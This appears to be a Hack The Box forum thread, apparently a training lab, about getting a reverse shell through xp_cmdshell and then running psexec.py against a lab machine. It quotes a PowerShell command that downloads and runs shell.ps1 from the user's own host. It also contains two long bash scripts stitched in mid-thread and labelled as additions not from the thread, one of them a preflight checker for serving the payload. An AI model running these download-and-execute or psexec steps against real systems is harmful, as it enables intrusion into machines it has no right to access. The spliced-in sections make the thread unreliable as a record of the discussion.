Starting Point reverse shell through xp_cmdshell

xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.218/shell.ps1\");""
output


Exception calling "DownloadString" with "1" argument(s): "The remote server returned an error: (404) Not Found."
At line:1 char:1
+ IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.218/sh
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : WebException

NULL

The error message implies that you aren’t serving a file called shell.ps1 on your server.

Make sure wherever you are running the server from has shell.ps1 in the same folder.

This might also be useful: FootHold Starting point - #4 by technopy - Machines - Hack The Box :: Forums

I tried that thread earlier but nothing worked.
Also, how do I put the file on the server?

Thank you

@TheAnarchist21 said:

I tried that thread earlier but nothing worked.
Also, how do I put the file on the server?

Ok - just to check I understand the situation:

  • is your IP address (tun0 interface) 10.10.14.218?
  • are you running a webserver on port 80, possibly along the lines of python3 -m http.server 80 or python -m SimpleHTTPServer 80 ?
  • do you have a file called shell.ps1 in the same folder as where you have started the server?
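The three questions in the reply above can be checked mechanically before re-running the xp_cmdshell stager. The script below is an added example and is not part of the thread. It assumes the payload is served with python3 -m http.server from a directory DIR, that the VPN interface is tun0, and that the target fetches the URL you pass (for example http://10.10.14.218/shell.ps1); the function names are the author's. A 404 means the web server answered but had no file at the requested path, so the local mapping of URL to DIR/path is the first thing checked.

```shell
#!/usr/bin/env bash
# preflight.sh: verify the tun0 address, the listener and the served file
# before sending the DownloadString stager. Added example, not from the thread.
# Assumes python3 -m http.server serving DIR and a tun0 VPN interface.

# url_host URL -> the host[:port] part of URL
url_host() { local h="${1#*://}"; printf '%s\n' "${h%%/*}"; }

# url_port URL -> the port part of URL, 80 if none is given
url_port() {
  local h p
  h="$(url_host "$1")"; p="${h##*:}"
  [ "$p" = "$h" ] && p=80
  printf '%s\n' "$p"
}

# url_to_file DIR URL -> the local file http.server would serve for URL
url_to_file() {
  local rest="${2#*://}"          # drop the scheme
  case "$rest" in
    */*) rest="${rest#*/}" ;;     # drop host[:port], keep the path
    *)   rest="" ;;               # bare host: the document root
  esac
  rest="${rest%%\?*}"             # drop any query string
  printf '%s/%s\n' "${1%/}" "$rest"
}

# payload_present DIR URL -> 0 if the mapped file exists and is non-empty
payload_present() { [ -s "$(url_to_file "$1" "$2")" ]; }

# iface_ip IFACE -> IPv4 address bound to IFACE (empty if the interface is down)
iface_ip() { ip -4 -o addr show dev "$1" 2>/dev/null | awk '{split($4, a, "/"); print a[1]}'; }

# listening PORT -> 0 if a TCP listener is bound to PORT
listening() { ss -ltn 2>/dev/null | awk 'NR > 1 {print $4}' | grep -q ":$1\$"; }

# preflight DIR URL -> one line per check; returns 0 only if every check passes
preflight() {
  local dir="$1" url="$2" rc=0 host port ip code
  host="$(url_host "$url")"; host="${host%%:*}"
  port="$(url_port "$url")"
  ip="$(iface_ip tun0)"
  if [ "$ip" = "$host" ]; then echo "[+] tun0 is $ip, matching the URL"
  else echo "[-] tun0 is '${ip:-down}' but the URL names $host"; rc=1; fi
  if listening "$port"; then echo "[+] a listener is bound to port $port"
  else echo "[-] nothing is listening on $port (run: cd $dir && python3 -m http.server $port)"; rc=1; fi
  if payload_present "$dir" "$url"; then echo "[+] $(url_to_file "$dir" "$url") exists"
  else echo "[-] $(url_to_file "$dir" "$url") is missing or empty: that is the 404"; rc=1; fi
  # Finally make the same request the target will make
  if command -v curl >/dev/null 2>&1; then
    code="$(curl -s -o /dev/null -w '%{http_code}' "$url")"
    if [ "$code" = 200 ]; then echo "[+] GET $url -> $code"
    else echo "[-] GET $url -> $code"; rc=1; fi
  fi
  return $rc
}

# Usage: bash preflight.sh /home/kali/Documents/HackTheBox http://10.10.14.218/shell.ps1
if [ $# -ge 2 ]; then preflight "$1" "$2"; fi
```

Run it from the attacking box with the directory you started the server in and the exact URL you put in the xp_cmdshell command; the curl check at the end reproduces the target's request, so a 404 there is the same 404 the PowerShell error reports.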

Yes, my IP address is 10.10.14.218
python -m http.server 80
Yes, I redid everything from the start and it worked, I don't know how.
Thank you.
Although I'm stuck now at psexec.py: it's saying that it cannot be found, or no such file or directory.

So when it says the file can't be found, it generally means some element of the path is incorrect.

If you are running this on Linux you may (depending on your OS) need to specify the exact location. You can find this with something like locate psexec.py, which psexec.py, or even find (find / -name "psexec.py" 2>/dev/null).

Then if it isn't on your path, you can invoke it by using the full path - for example if it was in /usr/share/some/folder/ you could run it with /usr/share/some/folder/psexec.py

It may also need python first - so some trial and error is needed.

I located the file
and I followed the tutorial

python3 psexec.py administrator@10.10.10.27

Traceback (most recent call last):
  File "psexec.py", line 10, in <module>
    import src
ModuleNotFoundError: No module named 'src'
This was the result.
Thank you again.

@TheAnarchist21 said:

I located the file
and I followed the tutorial

Awesome

python3 psexec.py administrator@10.10.10.27

Traceback (most recent call last):
  File "psexec.py", line 10, in <module>
    import src
ModuleNotFoundError: No module named 'src'
This was the result.
Thank you again.

So, I suspect this is a version of psexec.py that is set for python2.

There are a few things to try:

  • first, the default response to a missing python module should be to try and install it (start with pip install src and see if that works)
  • if that doesn't help, try python2 psexec.py administrator@10.10.10.27
  • if that doesn't help, try to reinstall the impacket tools.
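The two replies above (locate the script, then work out which interpreter it was written for) can be combined into one check. The script below is an added example, not part of the thread: it finds the script the way the earlier reply suggests (PATH, then locate, then find), lists the modules the script imports, and asks each interpreter you name which of them it cannot load when started in the script's own directory, which is the first place Python looks when it runs a script. The function names and the constructed sample in the usage note are the author's; the interpreter names are whatever your system has.

```shell
#!/usr/bin/env bash
# pyimports.sh: work out why "python3 psexec.py" stops at "No module named 'src'".
# Added example, not from the thread. Checks each import of the script against
# the interpreters given on the command line.

# find_script NAME -> first path to NAME found on PATH, in the locate db, or on disk
find_script() {
  local p
  if p="$(command -v "$1" 2>/dev/null)"; then printf '%s\n' "$p"; return 0; fi
  p="$(locate "/$1" 2>/dev/null | grep -E "/$1\$" | head -n 1)"
  [ -n "$p" ] || p="$(find / -type f -name "$1" 2>/dev/null | head -n 1)"
  [ -n "$p" ] && printf '%s\n' "$p"
}

# script_imports FILE -> top-level module names from "import X" and "from X import ..."
script_imports() {
  sed -nE 's/^[[:space:]]*(import|from)[[:space:]]+([A-Za-z_][A-Za-z0-9_]*).*/\2/p' "$1" | sort -u
}

# missing_modules PY FILE -> the names from script_imports that PY cannot import
# when started in FILE's directory (the same search path the script itself gets,
# so a package shipped next to the script counts as present)
missing_modules() {
  local py="$1" f="$2" dir m
  dir="$(dirname "$f")"
  for m in $(script_imports "$f"); do
    ( cd "$dir" && "$py" -c "import $m" ) >/dev/null 2>&1 || printf '%s\n' "$m"
  done
}

# diagnose NAME PY... -> report, per interpreter, which imports of NAME fail;
# returns 0 if at least one interpreter satisfies all of them
diagnose() {
  local name="$1" script py missing ok=1
  shift
  script="$(find_script "$name")"
  [ -n "$script" ] || { echo "[-] $name: not on PATH, in the locate database, or on disk"; return 1; }
  echo "[*] script: $script"
  for py in "$@"; do
    command -v "$py" >/dev/null 2>&1 || { echo "[-] $py: interpreter not installed"; continue; }
    missing="$(missing_modules "$py" "$script" | tr '\n' ' ')"
    if [ -z "$missing" ]; then echo "[+] $py: every import resolves"; ok=0
    else echo "[-] $py: cannot import: $missing"; fi
  done
  [ $ok -eq 0 ] || echo "[!] no interpreter satisfies the script: a name that is neither installed nor a package beside the script means the script was copied out of its tree, or the dependency is not installed for that interpreter"
  return $ok
}

# Usage: bash pyimports.sh psexec.py python3 python2
if [ $# -ge 2 ]; then diagnose "$@"; fi
```

Running it as bash pyimports.sh psexec.py python3 python2 answers the python2-or-python3 question in one go. A name reported missing by every interpreter, with no package of that name next to the script, is not fixed by pip install of a same-named PyPI package: the pip output later in this thread shows the PyPI package called src is an unrelated placeholder, not the module the script wants.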

So this happened:

root@kali:/home/kali/Documents/HackTheBox# python3 psexec.py
Traceback (most recent call last):
  File "psexec.py", line 10, in <module>
    import src
ModuleNotFoundError: No module named 'src'
root@kali:/home/kali/Documents/HackTheBox#
root@kali:/home/kali/Documents/HackTheBox# pip install src
Collecting src
  Downloading src-0.0.7.zip (6.3 kB)
Building wheels for collected packages: src
  Building wheel for src (setup.py) ... error
  ERROR: Command errored out with exit status 1:
   command: /usr/bin/python3 -u -c 'import sys, setuptools, tokenize; sys.argv[0] = '"'"'/tmp/pip-install-wqk5cigy/src/setup.py'"'"'; __file__='"'"'/tmp/pip-install-wqk5cigy/src/setup.py'"'"';f=getattr(tokenize, '"'"'open'"'"', open)(__file__);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, __file__, '"'"'exec'"'"'))' bdist_wheel -d /tmp/pip-wheel-xy366zqw
       cwd: /tmp/pip-install-wqk5cigy/src/
  Complete output (41 lines):
  running bdist_wheel
  running build
  running build_py
  creating build
  creating build/lib
  creating build/lib/src
  copying src/__init__.py -> build/lib/src
  running egg_info
  writing src.egg-info/PKG-INFO
  writing dependency_links to src.egg-info/dependency_links.txt
  writing entry points to src.egg-info/entry_points.txt
  writing requirements to src.egg-info/requires.txt
  writing top-level names to src.egg-info/top_level.txt
  reading manifest file 'src.egg-info/SOURCES.txt'
  reading manifest template 'MANIFEST.in'
  writing manifest file 'src.egg-info/SOURCES.txt'
  Traceback (most recent call last):
    File "<string>", line 1, in <module>
    File "/tmp/pip-install-wqk5cigy/src/setup.py", line 70, in <module>
      setup(
    File "/usr/lib/python3/dist-packages/setuptools/__init__.py", line 163, in setup
      return distutils.core.setup(**attrs)
    File "/usr/lib/python3.8/distutils/core.py", line 148, in setup
      dist.run_commands()
    File "/usr/lib/python3.8/distutils/dist.py", line 966, in run_commands
      self.run_command(cmd)
    File "/usr/lib/python3.8/distutils/dist.py", line 985, in run_command
      cmd_obj.run()
    File "/usr/lib/python3/dist-packages/wheel/bdist_wheel.py", line 225, in run
      install = self.reinitialize_command('install',
    File "/usr/lib/python3/dist-packages/setuptools/__init__.py", line 217, in reinitialize_command
      cmd = _Command.reinitialize_command(self, command, reinit_subcommands)
    File "/usr/lib/python3.8/distutils/cmd.py", line 305, in reinitialize_command
      return self.distribution.reinitialize_command(command,
    File "/usr/lib/python3.8/distutils/dist.py", line 950, in reinitialize_command
      for sub in command.get_sub_commands():
    File "/usr/lib/python3.8/distutils/cmd.py", line 324, in get_sub_commands
      if method is None or method(self):
    File "/usr/lib/python3.8/distutils/command/install.py", line 675, in has_lib
      return (self.distribution.has_pure_modules() or
  AttributeError: 'NoneType' object has no attribute 'has_pure_modules'

  ERROR: Failed building wheel for src
  Running setup.py clean for src
Failed to build src
Installing collected packages: src
    Running setup.py install for src ... error
    ERROR: Command errored out with exit status 1:
     command: /usr/bin/python3 -u -c 'import sys, setuptools, tokenize; sys.argv[0] = '"'"'/tmp/pip-install-wqk5cigy/src/setup.py'"'"'; __file__='"'"'/tmp/pip-install-wqk5cigy/src/setup.py'"'"';f=getattr(tokenize, '"'"'open'"'"', open)(__file__);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, __file__, '"'"'exec'"'"'))' install --record /tmp/pip-record-76hb4euk/install-record.txt --single-version-externally-managed --compile --install-headers /usr/local/include/python3.8/src
         cwd: /tmp/pip-install-wqk5cigy/src/
    Complete output (2 lines):
    running install
    You've probably made a mistake here and are trying to install from a 'src' directory which doesn't exist.
    ----------------------------------------
ERROR: Command errored out with exit status 1: /usr/bin/python3 -u -c 'import sys, setuptools, tokenize; sys.argv[0] = '"'"'/tmp/pip-install-wqk5cigy/src/setup.py'"'"'; __file__='"'"'/tmp/pip-install-wqk5cigy/src/setup.py'"'"';f=getattr(tokenize, '"'"'open'"'"', open)(__file__);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, __file__, '"'"'exec'"'"'))' install --record /tmp/pip-record-76hb4euk/install-record.txt --single-version-externally-managed --compile --install-headers /usr/local/include/python3.8/src Check the logs for full command output.

thanks again XD

Also, I tried python2; it didn't work.

Ok, then it looks like it's the third option. I don't know what else to suggest.

Okay thank you so much.

python3.8 psexec.py administrator@10.10.10.27
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.27.....
[*] Found writable share ADMIN$
[*] Uploading file IiPAmKEF.exe


and it pauses; it doesn't execute the other operations.